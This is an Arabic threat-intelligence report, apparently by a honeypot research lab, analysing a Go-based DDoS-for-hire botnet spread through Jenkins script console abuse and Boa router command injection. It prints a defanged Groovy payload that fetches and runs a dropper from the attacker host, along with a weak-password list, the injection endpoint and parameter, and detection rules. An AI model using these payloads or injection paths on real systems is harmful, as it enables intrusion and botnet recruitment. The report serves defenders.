malware · botnet · ddos · golang · iot · jenkins · honeypot · mirai
شبكة بوت DDoS للإيجار عابرة للأنظمة مكتوبة بلغة Go
حلّلت Kinryū Labs الملف bot.exe، وهو بناء Windows لشبكة بوت DDoS مُصرَّفة بلغة Go ومُوزَّعة كعُدّة إسقاط من 11 ثنائياً و13 معمارية، ومُسلَّمة عبر حملة استغلال لوحدة تحكم سكربتات Jenkins امتدّت عدة أيام. كشف الاستطلاع لمضيف التخزين المؤقت عن واجهة برمجة تطبيقات DDoS للإيجار حيّة ومُصادَق عليها، وقناة أوامر SSH مكتوبة بلغة Go، وعائلة من سلالة Mirai مُستضافة على المضيف نفسه. نقدّر بثقة عالية أن هذه عملية DDoS تجارية للإيجار.
بقلم Davis Zheng·
TLP:CLEAR. أُجيز للنشر العام. التُقطت العيّنة وعُدّة إسقاطها بواسطة شبكة مستشعرات مصائد Kinryū Labs أثناء حملة استغلال لـ Jenkins امتدّت عدة أيام ورُصدت عبر عدة مستشعرات. حُلِّلت الثنائيات المُلتقَطة تحليلاً ساكناً ولم تُشغَّل؛ اتّسم مضيف التخزين المؤقت للمشغّل باستطلاع خارجي فعّال (تعداد الخدمات، وسرد FTP المجهول، وسبر غير مُصادَق عليه لواجهة برمجة تطبيقات مكشوفة)، دون تجاوز أي مصادقة. مؤشرات المهاجم مُبطَّلة المخالب (defanged).
ملخص تنفيذي
- 13بناء معماري، 11 ثنائياً فريداً
- 5طرق DDoS مسمّاة، إضافة إلى واجهة برمجة تطبيقات للإيجار
- 3عناوين IP مصدر منسّقة في نطاق /22 واحد
- 2عائلتا شبكات بوت على مضيف واحد
bot.exe هو بناء Windows x86-64 لشبكة بوت DDoS مُصرَّفة بلغة Go ومُوزَّعة كعُدّة إسقاط متعددة المعماريات. يجلب سكربت صدفة مرافق، bins.sh، ثلاثة عشر بناءً معمارياً، أحد عشر منها فريدة بعد إزالة التكرار، تغطّي x86 بنسختَي 32 و64 بت، وأربعة أطياف ARM، وARM64، وAndroid ARM64، وMIPS بترتيبَي البايت الكبير والصغير، إلى جانب ثنائي Windows. وصلت العُدّة إلى شبكة المصائد عبر استغلال خادم Jenkins مكشوف.
تضمّن البرمجية الخبيثة خمس طرق إغراق (flood) مسمّاة (HTTP، ومصافحة TLS، وICMP، وTLS مباشر، وطريقة حجمية موسومة بـ VOULT)، وإغراق HTTP يبدّل سلاسل User-Agent الخاصة بالمتصفح ورؤوس اللغة المحلية كي يشبه حركة المرور المشروعة، وحمولات حقن أوامر تستهدف خادم Boa على أجهزة RealTek SDK بغرض الانتشار الذاتي. كشف الاستطلاع لمضيف التخزين المؤقت عند 185.226.93[.]242 عن واجهة برمجة تطبيقات DDoS للإيجار مُصادَق عليها على المنفذ 3333، وخدمة SSH مُنفَّذة بلغة Go على المنفذ 2222 تعمل قناةَ أوامر، وخدمة FTP مجهولة تخزّن مؤقتاً عائلة شبكة بوت ثانية من سلالة Mirai/Gafgyt.
تقدّر Kinryū Labs بـثقة عالية أن bot.exe جزء من شبكة بوت DDoS خبيثة ذاتية الانتشار ومتعددة المعماريات تُدار كخدمة تجارية للإيجار. ثلاثة نتائج تحمل التقييم: سلاسل طرق الهجوم والاستغلال الخاصة بالثنائي ذاته؛ وواجهة برمجة تطبيقات للإيجار حيّة على مضيف التخزين المؤقت للمشغّل تتحقّق من معطيات المهمة وتتطلّب مصادقة؛ وقياسات مصائد لحملة مستدامة متعددة العقد تسلّم العُدّة.
- bot.exe شبكة بوت DDoS عابرة للأنظمة مكتوبة بلغة Go. خمس سلاسل سجل لطرق إغراق متمايزة تحمل معطيات الهدف والمدة، إلى جانب آلية انتحال هوية المتصفح ودعم SOCKS5، جميعها في سلاسل غير مُبهَّمة ومؤيَّدة بواجهة برمجة التطبيقات الحيّة.
- العملية تُدار كخدمة DDoS تجارية للإيجار. يكشف مضيف التخزين المؤقت عن واجهة برمجة تطبيقات على المنفذ 3333 تتحقّق من معطيات المهمة (
userوpswوhostوmethodوtimeوport) وترفض بيانات الاعتماد غير الصالحة. - شبكة البوت تنتشر ذاتياً عبر حقن أوامر IoT. يحمل الثنائي حمولة حقن أوامر Boa
formSysCmd، ومسار تخمين شامل (brute-force) لتسجيل دخول جهاز التوجيه، والدالتين المُصدَّرتينloginDeviceوloginDeviceCaptcha، حاقناً سطر الإسقاط الواحد ذاته المُسجَّل في سجلات المصائد. - عناوين IP المصدر الثلاثة مشغّل واحد. سلّمت ثلاثة عناوين في
185.226.92[.]0/22حمولات متطابقة بتوقيت منسّق وقائمة بيانات اعتماد مشتركة، وتقدّم عناوين IP التسليم والتخزين المؤقت مفاتيح مضيف SSH متطابقة، ما يشير إلى مضيف واحد أو صور مُستنسَخة.
التسليم: حملة مستدامة على وحدة تحكم سكربتات Jenkins
سُلِّمت العُدّة عبر استغلال نسخة Jenkins مكشوفة على الإنترنت. سجّلت قياسات المصائد أسلوباً ثابتاً من خطوتين: طلب GET /crumbIssuer/api/json لاسترجاع رمز CSRF، متبوعاً بـ POST /script يحمل حمولة وحدة تحكم سكربتات Groovy. كانت الحمولة متطابقة عبر المحاولات، وهي هنا مُبطَّلة المخالب:
println new ProcessBuilder('sh','-c',
'cd /tmp; wget hxxp://185.226.93[.]242:1001/bins.sh;
curl -O hxxp://185.226.93[.]242:1001/bins.sh;
chmod 777 *; ./bins.sh'
).redirectErrorStream(true).start().text
حملت الطلبات رأس Authorization: Basic يدوّر قاموساً قصيراً من كلمات المرور الرقمية الضعيفة لحساب admin (admin:1123 وadmin:123451 وadmin:1231231 وadmin:1111111 وadmin:12345123)، وهي بصمة قائمة بيانات اعتماد آلية لا مصادقة موجّهة.
امتدّت الحملة عبر عدة أيام في موجات متكرّرة:
- الموجة 1أولى عمليات السبر: فحص crumb الخاص بـ CSRF متبوعاً بتنفيذ Groovy عن بُعد (RCE)، من عنوان IP التخزين المؤقت وعنوان ثانٍ في الكتلة ذاتها.
- الالتقاطاستُرجع
bins.shوجميع المتغيّرات الثلاثة عشر عند مستشعرَين على بُعد نحو أربع عشرة ساعة، متطابقة بايتاً ببايت عندهما. - موجات لاحقةاستغلال متوازٍ من عناوين IP المصدر الثلاثة جميعها في غضون دقائق من بعضها، مع تدوير User-Agent.
دوّرت طلبات الاستغلال مجموعة كبيرة من User-Agent متصفّح واقعية، بينما استخدم مسح الاستطلاع الباحث عن أهداف Jenkins إضافية (جلب /login متبوعاً بدفقة سريعة من طلبات /script) القيمة الافتراضية Go-http-client/1.1. تركب User-Agent المنتحَلة حمولات الاستغلال؛ أما الماسح فيستخدم عميل Go الأصلي لشبكة البوت. شارك مضيف التخزين المؤقت وC2 ذاته في الاستغلال، فبنية الهجوم وبنية الاستضافة غير منفصلتين.
البرمجية الخبيثة: قاعدة كود Go واحدة، أحد عشر ثنائياً
كتابة البوت بلغة Go تتيح لقاعدة كود واحدة التصريف التبادلي لكل هدف يريده المشغّل. يجوب برنامج الإسقاط خطّ المنتج كاملاً، فيجلب كل بناء بـ wget ثم بـ curl كبديل احتياطي، ويجعله قابلاً للتنفيذ، ويشغّله، ويحذفه. تتضمّن العُدّة ملف .exe لـ Windows، يمرّره برنامج الإسقاط الخاص بـ Linux مع ذلك عبر chmod +x، وتشير البنية المُولَّدة للسكربت إلى خط أنابيب بناء وسرد. بعد إزالة التكرار تنخفض الثلاثة عشر بناءً إلى أحد عشر ثنائياً فريداً: بناءا x86 وi386 متطابقان، وكذلك بناءا ARM العام وARMv7. يمتدّ انتشار المعماريات، من MIPS وARM القديم مروراً بـ Android، ليسم شبكة بوت موجّهة إلى أجهزة التوجيه والكاميرات وسائر الأجهزة المُضمَّنة؛ ويحمل بناء Windows الكود ذاته إلى الحواسيب المكتبية والخوادم.
الثنائي غير مُحزَّم (packed) (تقع إنتروبيا مقاطع PE بين 5.4 و6.3) وغير مُجرَّد من الرموز (stripped) (معرّف بناء Go ورموز وقت التشغيل سليمة)، فقدراته ماثلة في سلاسل عادية. الطابع الزمني للتصريف مصفَّر، وهو أمر طبيعي لبناءات Go.
خمس طرق إغراق مسمّاة في سلاسل سجل الثنائي، كلٌّ مُنسَّق بهدف ومدة: إغراق “HTTP (Optimized)”، وإغراق استنزاف “Handshake” على TLS/TCP، وإغراق “PING” على ICMP، وإغراق جلسة “TLS+” مباشر، وطريقة “VOULT”، حجمية ويُرجَّح أنها قائمة على UDP. حاضرة خيارات طبقة التطبيق وطبقة الشبكة كلتاهما.
إغراق HTTP مبنيّ ليمرّ كحركة مرور مشروعة. يدوّر أكثر من عشر سلاسل User-Agent متصفّح عبر Chrome وEdge وOpera وFirefox وSafari على Windows وmacOS وiPad وAndroid؛ وخمس عشرة لغة محلية في Accept-Language؛ ورؤوس البصمة sec-fetch-* وsec-ch-ua-* التي تفحصها خدمات التخفيف. يضبط Referer من مجموعة صغيرة من المواقع عالية السمعة (google.com وreddit.com وfacebook.com وbing.com وtwitter.com وfbi.gov). أحد المدخلات في مجموعة User-Agent هو السلسلة الحرفية Hello World، وهي عنصر نائب لمطوّر يصنع بصمة كشف نظيفة لأن لا عميل مشروعاً يرسلها.
يستهدف الانتشار خادم Boa، وهو عفريت HTTP مُضمَّن صغير لا يزال يُشحن على كثير من أجهزة توجيه وكاميرات RealTek SDK. يحمل الثنائي حمولة حقن أوامر ضد معالج formSysCmd في Boa، ومسار تخمين شامل لتسجيل الدخول ضد واجهات إدارة أجهزة التوجيه، مع حقول بيانات اعتماد JSON والدالتين المُصدَّرتين loginDevice وloginDeviceCaptcha. الأمر المحقون هو سطر الإسقاط الواحد، فيصبح الجهاز المُختَرق نقطةَ تسليم الجهاز التالي.
وحدات Go المُورَّدة (vendored) جميعها حزم golang.org/x قياسية، دون أي إطار C2 من طرف ثالث مرتبط بها. تشمل chacha20poly1305 وhttp2/hpack وdns/dnsmessage وhttp/httpproxy، متطابقةً مع القدرات المُلاحَظة: قناة مشفّرة مُصادَق عليها، وHTTP/2، وDNS خام، وبروكسي SOCKS5 (السلاسل socks5 وsocks connect وsocksUsernamePassword حاضرة). يُسترجع إعداد C2 وقت التشغيل من hxxp://<C2>/config.dat؛ والعنوان الوحيد المُضمَّن بالكود في الثنائي هو مضيف التخزين المؤقت.
القيادة والتحكّم وبنية التخزين المؤقت
كشف الاستطلاع لمضيف التخزين المؤقت عن الخدمات التالية:
| المنفذ | الخدمة | الغرض |
|---|---|---|
| 21/tcp | vsftpd 3.0.3، تسجيل الدخول المجهول مُفعَّل | تخزين مؤقت للبرمجية الخبيثة (العائلة الثانية، أدناه) |
| 22/tcp | OpenSSH 9.2p1 (Debian) | وصول المشغّل |
| 1001/tcp | خادم Go net/http | التخزين المؤقت الأساسي: يقدّم bins.sh والمتغيّرات |
| 2222/tcp | Go SSH (SSH-2.0-Go) | قناة أوامر البوت |
| 3333/tcp | خادم Go net/http | واجهة برمجة تطبيقات DDoS للإيجار |
نتيجتان تدعمان تقييم الإيجار. يقدّم عنوان IP التسليم ومضيف التخزين المؤقت مفاتيح مضيف SSH متطابقة من نوع ED25519 وRSA وECDSA، ما يضعهما على الجهاز ذاته أو على صور مُستنسَخة من قالب واحد، وتقدّم خدمة Go SSH على المنفذ 2222 مفتاحاً متمايزاً عن OpenSSH النظامي على المنفذ 22، ما يسمها تطبيقاً منفصلاً لا إعادة توجيه. ترفض واجهة برمجة التطبيقات على المنفذ 3333 طلباً تنقصه المعطيات (user وpsw وhost وmethod وtime/duration وport) وتُرجِع فشل مصادقة لبيانات اعتماد اختبارية، مع إرجاع كل المسارات الأخرى 404. هذه هي الواجهة الدنيا المُصادَق عليها لكل طلب لمنصّة booter تجارية، تعمل على بنية تحتية حيّة.
عائلة ثانية على المضيف ذاته
تخزّن خدمة FTP المجهولة عائلة شبكة بوت منفصلة، يُشار إليها هنا بـ “boatnet” نسبةً إلى أسماء ملفاتها. يستخدم برنامج إسقاطها (ohshit1.sh) عميل ftpget من BusyBox، ويعيد تسمية كل ثنائي إلى WTF قبل التنفيذ، ويطلق البناءات في الخلفية عبر خمس عشرة معمارية، بما فيها أهداف مُضمَّنة نادرة (ARC وm68k وSH4 وSPARC) من سلالة Mirai/Gafgyt. الثنائيات ELF مُصرَّفة بلغة C، ومُجرَّدة من الرموز، ومُحزَّمة (إنتروبيا 7.6 إلى 7.9 دون رقم UPX السحري، ما يدلّ على مُحزِّم مخصّص)، فقليل ينجو من المراجعة الساكنة. تسبق آثار boatnet عُدّة bot.exe وتشغّل قاعدة كود غير ذات صلة، فمضيف واحد يخزّن مؤقتاً عائلتَي شبكات بوت متمايزتين.
الاستضافة
يقع عنوانا IP المهاجم كلاهما في 185.226.92[.]0/22، المُسجَّل لمزوّد VPS مقرّه تركيا (اسم الشبكة BIGCORE-US، AS205196 / AS57152) عبر RIPE NCC، بجهة اتصال إساءة استخدام [email protected]. نحدّد مزوّد الاستضافة لأغراض الإبلاغ ولا نطرح أي ادّعاء بشأن هوية المشغّل.
مؤشرات الاختراق
بنية المهاجم مُبطَّلة المخالب. بصمات العيّنات وسلاسل الكشف تحمل قيماً حيّة بحكم التصميم.
الشبكة
| المؤشر | السياق |
|---|---|
185.226.93[.]242 | مضيف التخزين المؤقت + C2؛ وأيضاً ماسح نشط |
185.226.92[.]110 | الماسح الأساسي / عقدة التسليم |
185.226.92[.]173 | الماسح الثانوي |
185.226.92[.]0/22 | تخصيص الاستضافة (BIGCORE، AS205196). حظر محيطي معقول |
185.226.93[.]242:1001 | التخزين المؤقت على HTTP (bins.sh + المتغيّرات) |
185.226.93[.]242:2222 | قناة أوامر Go SSH |
185.226.93[.]242:3333 | واجهة برمجة تطبيقات DDoS للإيجار (/api، مُقيَّدة بالمعطيات) |
185.226.93[.]242:21 | FTP مجهول، تخزين boatnet المؤقت |
hxxp://<C2>/config.dat | نمط استرجاع إعداد C2 وقت التشغيل |
/boafrm/formSysCmd، /boafrm/formLogin | معرّفات موارد Boa RCE والتخمين الشامل لتسجيل الدخول في الانتشار الصادر |
مفتاح مضيف SSH (ED25519) …INAjVN5fIlxTHxT4R3yqTS8… | مشترك عبر عنوانَي IP التسليم وC2؛ مؤشر ارتكاز (pivot) |
الملفات
| الملف | SHA-256 |
|---|---|
bot.exe (Windows x64) | 4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e3804 |
bins.sh (برنامج الإسقاط) | 15f92c41e5f8ee6b2f6b7cfd14d2fc61bd4163a45d79c20a4d7974cb0fe68cf6 |
boatnet.0eem0a9ali (i386) | 6fbd581a3a6f1152de4090f0d5387258a905c76fb58f0d58191eae5f3d30421b |
boatnet.0t25ax67hl (x86-64) | 920b114325d372c387616ff971947b42087dc018bb4812cdf2adae6005c1382d |
- bot.exe MD5 / SHA-1 / imphash:
88efcb919000efb700a814fc23e31e3f/6817eae057adf831892995f514fca36c489fdd10/211e227000a1da3333aab2bad5282318 - Go Build ID:
euzQMg9dNAAGDYR0FLBy/NBlt-oXDyZN8MvU4a30l/8dJq21Cvc4y0nwb3h6ja/kYq23qQRIeCoh9BwgyGK
بصمات عُدّة الإسقاط كاملةً (11 فريدة عبر 13 بناءً)
| البناء | SHA-256 | الحجم (بايت) |
|---|---|---|
amd64 | 3261921456e347fb40c2d0a605db61ee058020872486c844653696d03ebb7b70 | 5,919,119 |
x86 / i386 | 575eba4fffff7419985e4eef8e010c6c0a7dae00b23db45de895547faf2cc398 | 5,787,832 |
arm / armv7l | 9e6da804ae9ca0a07348e92d99416bcf3fc650ccbdf4a9b4db34f6d546ddfb10 | 5,898,424 |
arm5 | 365e22a1c1a77e5d88727ab6f8050548aa2170d3c2b4c8adcdfc1eb89eaea582 | 5,898,424 |
arm6 | 34186fba4b5a9c640517020d43a1ba70bdf59f1163867917950e2f7459a0839f | 5,898,424 |
arm64 | ada33a0316d364d1d3be6d23ca2e590c16db7d845795619935e42e53f9293f6b | 5,579,151 |
android_arm64 | 7d7210719451068df7906798f37ec8fd86a0dfc3df10bfa939e3d436c72346cf | 6,169,144 |
mips | 9200aac4a356190252dc6131f6b60d59367c522537258838c017266d0e3b48f5 | 6,619,351 |
mipsle | 14d62a04e97f20f2d087dcf41fb44e5597cd3d6fbe4a597229d6b3c79c8ecde7 | 6,619,351 |
bot.exe | 4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e3804 | 6,020,608 |
آثار المضيف وبيانات الاعتماد
- قاموس التخمين الشامل لحساب
adminفي Jenkins:1123و123451و1231231و1111111و12345123. ohshit1.sh(برنامج إسقاط boatnet) وثنائي مُعاد تسميته إلىWTFقبل التنفيذ.- User-Agent مميّزة:
Hello World(إغراق HTTP للبوت) وGo-http-client/1.1(المسح الذاتي للبوت).
سلوكية
GET /crumbIssuer/api/jsonفي Jenkins متبوعاً بـPOST /scriptيحمل حمولة GroovyProcessBuilder('sh','-c', …)تجلبbins.sh.- طلبات صادرة إلى مضيف تحت
/config.dat، مسبوقةً بسطر سجلConnecting to CNC.... - طلب وارد
POST /boafrm/formSysCmdبـsysCmdselect=5وجسمwget … bins.sh.
الكشف
السلاسل مستقرّة وغير مُبهَّمة، فالتواقيع مباشرة. قاعدة YARA أدناه مرشّحة مبنية من سلاسل مُتحقَّق منها؛ تحقّق منها قبل النشر.
rule go_ddos_bot_multiarch_candidate
{
meta:
description = "Candidate: Go-compiled multi-arch DDoS botnet (bot.exe family)"
author = "Kinryu Labs honeypot CTI"
reference = "4de4621f...e3804" // full SHA-256 in the IOC table
tlp = "CLEAR"
strings:
$cnc = "Connecting to CNC..." ascii
$cfg = "/config.dat" ascii
$atk1 = "HTTP (Optimized) Attack started" ascii
$atk2 = "VOULT attack" ascii
$atk3 = "Handshake Attack started" ascii
$boa = "/boafrm/formSysCmd" ascii
$iot = "loginDeviceCaptcha" ascii
$drop = "bins.sh" ascii
condition:
($cnc and $cfg) or ($boa and $drop) or (2 of ($atk1, $atk2, $atk3) and $iot)
}
الكشف الشبكي:
- Jenkins: نبّه على أجسام
POST /scriptالمحتوية علىProcessBuilderمعwget/curlإلى عنوان IP خام، خصوصاً حين تُسبَق بـGET /crumbIssuer/api/json. - انتشار IoT:
content:"/boafrm/formSysCmd"; content:"sysCmdselect=5";. - البنية التحتية: احظر
185.226.92[.]0/22، الذي يغطّي عناوين التسليم وC2، ونبّه على الاتصالات الصادرة إلى المنافذ 1001 و2222 و3333 في ذلك النطاق.
المعالجة
- لا تعرّض Jenkins للإنترنت. ضعه خلف مصادقة وعزل شبكي، وعطّل وحدة تحكم السكربتات لغير المسؤولين، وعامل خادم بناء يمكن الوصول إليه كخطر اختراق للمضيف كله. كان هذا ناقل التسليم.
- افرض بيانات اعتماد Jenkins قوية وقيّد معدّل المصادقة. اتّكأت الحملة على قاموس قصير من كلمات المرور الرقمية الضعيفة لحساب
admin. - افصل أو استبدل أجهزة التوجيه وأجهزة IoT القائمة على RealTek/Boa، واحظر الوصول الخارجي إلى واجهات إدارتها. هذه هي هدف انتشار شبكة البوت.
- احظر تخصيص الاستضافة (
185.226.92[.]0/22) عند المحيط ونبّه على معرّف موارد Boa RCE ونمط استرجاعconfig.dat. - رشّح الخروج (egress). مضيف يصل إلى عنوان IP خام على المنفذ 1001 لسحب ملفات مسمّاة بالمعمارية، أو يتصل بالمنفذ 2222 أو 3333 في ذلك النطاق، شاذّ وقابل للالتقاط حيث يغيب كشف المضيف.
- أبلغ عن البنية التحتية. يمكن الإبلاغ عن واجهة برمجة تطبيقات DDoS للإيجار والبرمجية الخبيثة المُخزَّنة على FTP إلى جهة اتصال إساءة الاستخدام لدى مزوّد الاستضافة (
[email protected]).
مخطط MITRE ATT&CK
| التكتيك | التقنية |
|---|---|
| Initial Access | T1190 Exploit Public-Facing Application (وحدة تحكم سكربتات Jenkins؛ Boa formSysCmd للانتشار) |
| Credential Access | T1110.001 Brute Force: Password Guessing (Jenkins admin); T1110.004 Credential Stuffing (تسجيل دخول IoT) |
| Execution | T1059 Command and Scripting Interpreter (Groovy عبر وحدة تحكم السكربتات؛ برنامج إسقاط صدفة Unix) |
| Discovery | T1046 Network Service Scanning (المسح الذاتي لـ Jenkins/IoT); T1082 System Information Discovery; T1057 Process Discovery |
| Defense Evasion | T1036 Masquerading (تدوير User-Agent المتصفّح؛ إعادة تسمية boatnet إلى WTF) |
| Command and Control | T1071.001 Web Protocols (config.dat); T1573 Encrypted Channel (ChaCha20-Poly1305؛ Go SSH على 2222); T1571 Non-Standard Port (1001/2222/3333); T1090.001 Internal Proxy: SOCKS |
| Lateral Movement / Delivery | T1105 Ingress Tool Transfer (تخزين مؤقت متعدد المعماريات) |
| Impact | T1498.001 Direct Network Flood (PING، VOULT); T1498.002 Reflection Amplification (استنزاف المصافحة) |
المنهجية وملاحظات
- النطاق: تحليل ساكن للثنائيات المُلتقَطة، التي لم تُشغَّل، واستطلاع خارجي فعّال لمضيف التخزين المؤقت (تعداد الخدمات واللافتات، وسرد FTP المجهول، وسبر غير مُصادَق عليه لواجهة برمجة التطبيقات على المنفذ 3333). لم تُتجاوَز أي مصادقة.
- قاعدة YARA مرشّحة مبنية من سلاسل مُتحقَّق منها؛ تحقّق منها قبل النشر. ثنائيات boatnet مُحزَّمة وأنتجت سلاسل قليلة.
- العيّنات (عُدّة bot.exe، وبرنامج الإسقاط، وآثار boatnet) متاحة للباحثين والمدافعين الآخرين عند الطلب. راسل [email protected] مع ملاحظة قصيرة عمّن أنت وما حاجتك إليها.